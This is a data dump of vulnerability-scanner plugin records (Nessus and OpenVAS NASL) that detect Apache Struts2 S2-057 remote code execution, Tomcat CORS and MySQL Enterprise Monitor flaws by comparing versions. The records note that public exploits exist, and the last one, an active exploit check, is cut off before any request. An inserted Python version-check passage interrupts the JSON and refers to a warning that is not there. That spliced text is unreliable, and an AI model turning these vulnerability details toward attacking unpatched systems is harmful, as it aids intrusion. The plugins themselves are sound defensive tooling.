script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\");\n script_require_ports(\"Services/www\", 18443);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\napp = 'MySQL Enterprise Monitor';\nport = get_http_port(default:18443);\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:true);\n\nconstraints = [\n {'min_version' : '3.4', 'fixed_version' : '3.4.10'},\n {'min_version' : '4.0', 'fixed_version' : '4.0.7'},\n {'min_version' : '8.0', 'fixed_version' : '8.0.3'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:oracle:mysql_enterprise_monitor"], "solution": "Upgrade to MySQL Enterprise Monitor version 3.4.10, 4.0.7, 8.0.3 or later as referenced in the Oracle security advisory.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2018-11776", "vendor_cvss2": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "vendor_cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "vpr": {"risk factor": "High", "score": "8.4"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2018-10-15T00:00:00", "vulnerabilityPublicationDate": "2018-05-11T00:00:00", "exploitableWith": ["Elliot(Apache Struts 2 Multiple Tags Result Namespace Handling RCE)", "Metasploit(Apache Struts 2 Namespace Redirect OGNL Injection)"]}
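The plugin source above decides purely on the detected version against a constraints list (3.4 to below 3.4.10, 4.0 to below 4.0.7, 8.0 to below 8.0.3). The following is an added example, not Tenable's NASL or its vcf library, reimplementing that range check in Python with per-component numeric comparison; a plain string comparison would rank 8.0.10 below 8.0.3 and report a patched host as vulnerable. The version strings used are constructed inputs, and the result is only as good as the self-reported version the note above warns about.

```python
"""Version-range check mirroring the plugin's constraints list.

Added example; not the Nessus plugin's NASL and not Tenable's vcf library.
"""
import re

# Same ranges as the plugin's constraints: min_version <= installed < fixed_version.
CONSTRAINTS = [
    {"min_version": "3.4", "fixed_version": "3.4.10"},
    {"min_version": "4.0", "fixed_version": "4.0.7"},
    {"min_version": "8.0", "fixed_version": "8.0.3"},
]


def parse_version(v):
    """'8.0.3' -> (8, 0, 3). Parsing stops at the first non-numeric component."""
    parts = []
    for piece in re.split(r"[.\-]", v.strip()):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def _pad(a, b):
    """Right-pad the shorter tuple with zeros so (8, 0) compares as (8, 0, 0)."""
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)), b + (0,) * (n - len(b))


def version_lt(a, b):
    x, y = _pad(parse_version(a), parse_version(b))
    return x < y


def version_ge(a, b):
    return not version_lt(a, b)


def matching_fix(version, constraints=CONSTRAINTS):
    """The fixed version the installed version falls under, or None if unaffected."""
    for c in constraints:
        if version_ge(version, c["min_version"]) and version_lt(version, c["fixed_version"]):
            return c["fixed_version"]
    return None


if __name__ == "__main__":
    for v in ("3.4.9", "4.0.7", "8.0.2", "8.0.10", "8.0"):  # constructed inputs
        print(v, "->", matching_fix(v))
```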
{"openvas": [{"lastseen": "2019-05-29T18:33:27", "description": "This host is running Apache Struts and is\n prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2018-08-23T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310813786", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813786", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813786\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-08-23 12:45:43 +0530 (Thu, 23 Aug 2018)\");\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057)\");\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_require_ports(\"Services/www\", 8080);\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions\n when namespace value isn't set for a result defined in underlying configurations\n and in same time, its 
upper action(s) configurations have no or wildcard\n namespace. Same possibility when using url tag which doesn't have value and\n action set and in same time, its upper action(s) configurations have no or\n wildcard namespace.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attacker to possibly conduct remote code on the affected application.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34,\n and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or\n 2.5.17 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:appPort, exit_no_version:TRUE)) exit(0);\nappVer = infos['version'];\npath = infos['location'];\n\nif(version_in_range(version:appVer, test_version:\"2.3\", test_version2:\"2.3.34\")){\n fix = \"2.3.35\";\n}\nelse if(version_in_range(version:appVer, test_version:\"2.5\", test_version2:\"2.5.16\")){\n fix = \"2.5.17\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:appPort);\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-20T18:49:30", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for tomcat (EulerOS-SA-2018-1220)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014"], "modified": "2020-02-18T00:00:00", "id": "OPENVAS:1361412562311220181220", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562311220181220", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1220\");\n script_version(\"2020-02-18T11:13:49+0000\");\n script_cve_id(\"CVE-2018-8014\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-18 11:13:49 +0000 (Tue, 18 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:17:54 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for tomcat (EulerOS-SA-2018-1220)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1220\");\n 
script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1220\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'tomcat' package(s) announced via the EulerOS-SA-2018-1220 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.(CVE-2018-8014)\");\n\n script_tag(name:\"affected\", value:\"'tomcat' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~7.0.76~3.h1\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-admin-webapps\", rpm:\"tomcat-admin-webapps~7.0.76~3.h1\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-el-2.2-api\", rpm:\"tomcat-el-2.2-api~7.0.76~3.h1\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-jsp-2.2-api\", rpm:\"tomcat-jsp-2.2-api~7.0.76~3.h1\", rls:\"EULEROS-2.0SP2\"))) {\n report += 
res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-lib\", rpm:\"tomcat-lib~7.0.76~3.h1\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-servlet-3.0-api\", rpm:\"tomcat-servlet-3.0-api~7.0.76~3.h1\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-webapps\", rpm:\"tomcat-webapps~7.0.76~3.h1\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-09T17:44:50", "description": "It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn", "cvss3": {}, "published": "2020-06-05T00:00:00", "type": "openvas", "title": "Huawei Data Communication: Apache Struts2 S2-057 Remote Code Execution Vulnerability in Some Huawei Products (huawei-sa-20181121-01-struts2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2020-06-06T00:00:00", "id": "OPENVAS:1361412562310108792", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108792", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108792\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2018-11776\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Apache Struts2 S2-057 Remote Code Execution Vulnerability in Some Huawei Products (huawei-sa-20181121-01-struts2)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn't set for a result defined in underlying configurations and in same time, its upper package configuration have no or wildcard namespace and same possibility when using url tag which doesn't have value and action set and in same time, its upper package configuration have no or wildcard namespace.\");\n\n script_tag(name:\"insight\", value:\"It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn't set 
for a result defined in underlying configurations and in same time, its upper package configuration have no or wildcard namespace and same possibility when using url tag which doesn't have value and action set and in same time, its upper package configuration have no or wildcard namespace. (Vulnerability ID: HWPSIRT-2018-08200) This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2018-11776. Huawei has released software updates to fix this vulnerability. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this vulnerability to perform a remote code execution attack.\");\n\n script_tag(name:\"affected\", value:\"Seco VSM versions V200R002C00\n\neLog versions V200R005C00 V200R006C10 V200R007C00SPC100\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20181121-01-struts2-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-20T18:49:31", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for tomcat (EulerOS-SA-2018-1227)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014"], "modified": "2020-02-18T00:00:00", "id": "OPENVAS:1361412562311220181227", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181227", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the 
referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1227\");\n script_version(\"2020-02-18T11:13:49+0000\");\n script_cve_id(\"CVE-2018-8014\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-18 11:13:49 +0000 (Tue, 18 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:18:04 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for tomcat (EulerOS-SA-2018-1227)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1227\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1227\");\n\n script_tag(name:\"summary\", value:\"The remote host 
is missing an update for the Huawei EulerOS\n 'tomcat' package(s) announced via the EulerOS-SA-2018-1227 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.(CVE-2018-8014)\");\n\n script_tag(name:\"affected\", value:\"'tomcat' package(s) on Huawei EulerOS V2.0SP3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~7.0.76~3.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-admin-webapps\", rpm:\"tomcat-admin-webapps~7.0.76~3.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-el-2.2-api\", rpm:\"tomcat-el-2.2-api~7.0.76~3.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-jsp-2.2-api\", rpm:\"tomcat-jsp-2.2-api~7.0.76~3.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-lib\", rpm:\"tomcat-lib~7.0.76~3.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"tomcat-servlet-3.0-api\", rpm:\"tomcat-servlet-3.0-api~7.0.76~3.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-webapps\", rpm:\"tomcat-webapps~7.0.76~3.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-25T11:52:43", "description": "This host is installed with Apache Tomcat\n and is prone to a security bypass vulnerability.", "cvss3": {}, "published": "2018-05-22T00:00:00", "type": "openvas", "title": "Apache Tomcat 'CORS Filter' Setting Security Bypass Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014"], "modified": "2019-07-24T00:00:00", "id": "OPENVAS:1361412562310813378", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813378", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Tomcat 'CORS Filter' Setting Security Bypass Vulnerability\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tomcat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813378\");\n script_version(\"2019-07-24T08:39:52+0000\");\n script_cve_id(\"CVE-2018-8014\");\n script_bugtraq_id(104203);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-24 08:39:52 +0000 (Wed, 24 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-22 12:31:15 +0530 (Tue, 22 May 2018)\");\n script_name(\"Apache Tomcat 'CORS Filter' Setting Security Bypass Vulnerability\");\n\n ## It can result in a FP if users of the CORS filter have configured it appropriately\n ## for their environment rather than using it in the default configuration\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apache Tomcat\n and is prone to a security bypass vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists because the default settings\n for the CORS filter provided in Apache Tomcat are insecure and enable\n 'supportsCredentials' for all origins.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to bypass certain security restrictions and perform unauthorized\n actions. 
This may aid in further attacks.\");\n\n script_tag(name:\"affected\", value:\"Apache Tomcat versions 9.0.0.M1 to 9.0.8\n Apache Tomcat versions 8.5.0 to 8.5.31\n Apache Tomcat versions 8.0.0.RC1 to 8.0.52\n Apache Tomcat versions 7.0.41 to 7.0.88\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Tomcat version 9.0.9,\n 8.0.53, 7.0.89 or 8.5.32 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://tomcat.apache.org/security-9.html\");\n script_xref(name:\"URL\", value:\"http://tomcat.apache.org/security-8.html\");\n script_xref(name:\"URL\", value:\"http://tomcat.apache.org/security-7.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"gb_apache_tomcat_consolidation.nasl\");\n script_mandatory_keys(\"apache/tomcat/detected\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"revisions-lib.inc\");\ninclude(\"version_func.inc\");\n\nif(isnull(tomPort = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:tomPort, exit_no_version:TRUE))\n exit(0);\n\nappVer = infos['version'];\npath = infos['location'];\n\nif(appVer =~ \"^8\\.5\")\n{\n if(version_in_range(version:appVer, test_version: \"8.5.0\", test_version2: \"8.5.31\")){\n fix = \"8.5.32\";\n }\n}\nelse if(appVer =~ \"^7\\.0\")\n{\n if(version_in_range(version:appVer, test_version: \"7.0.41\", test_version2: \"7.0.88\")){\n fix = \"7.0.89\";\n }\n}\nelse if(appVer =~ \"^8\\.0\")\n{\n if((revcomp(a:appVer, b: \"8.0.0.RC1\") >= 0) && (revcomp(a:appVer, b: \"8.0.53\") < 0)){\n fix = \"8.0.53\";\n }\n}\nelse if(appVer =~ \"^9\\.0\")\n{\n if((revcomp(a:appVer, b: \"9.0.0.M1\") >= 0) && (revcomp(a:appVer, b: \"9.0.9\") < 0)){\n fix = \"9.0.9\";\n }\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:appVer, 
fixed_version:fix, install_path:path);\n security_message(port:tomPort, data: report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T10:31:11", "description": "This host is running Apache Struts and is prone to a remote code execution\nvulnerability.", "cvss3": {}, "published": "2018-08-27T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2020-05-05T00:00:00", "id": "OPENVAS:1361412562310141398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141398", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141398\");\n script_version(\"2020-05-05T10:19:36+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 10:19:36 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-27 13:07:39 +0700 (Mon, 27 Aug 2018)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2018-11776\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\");\n 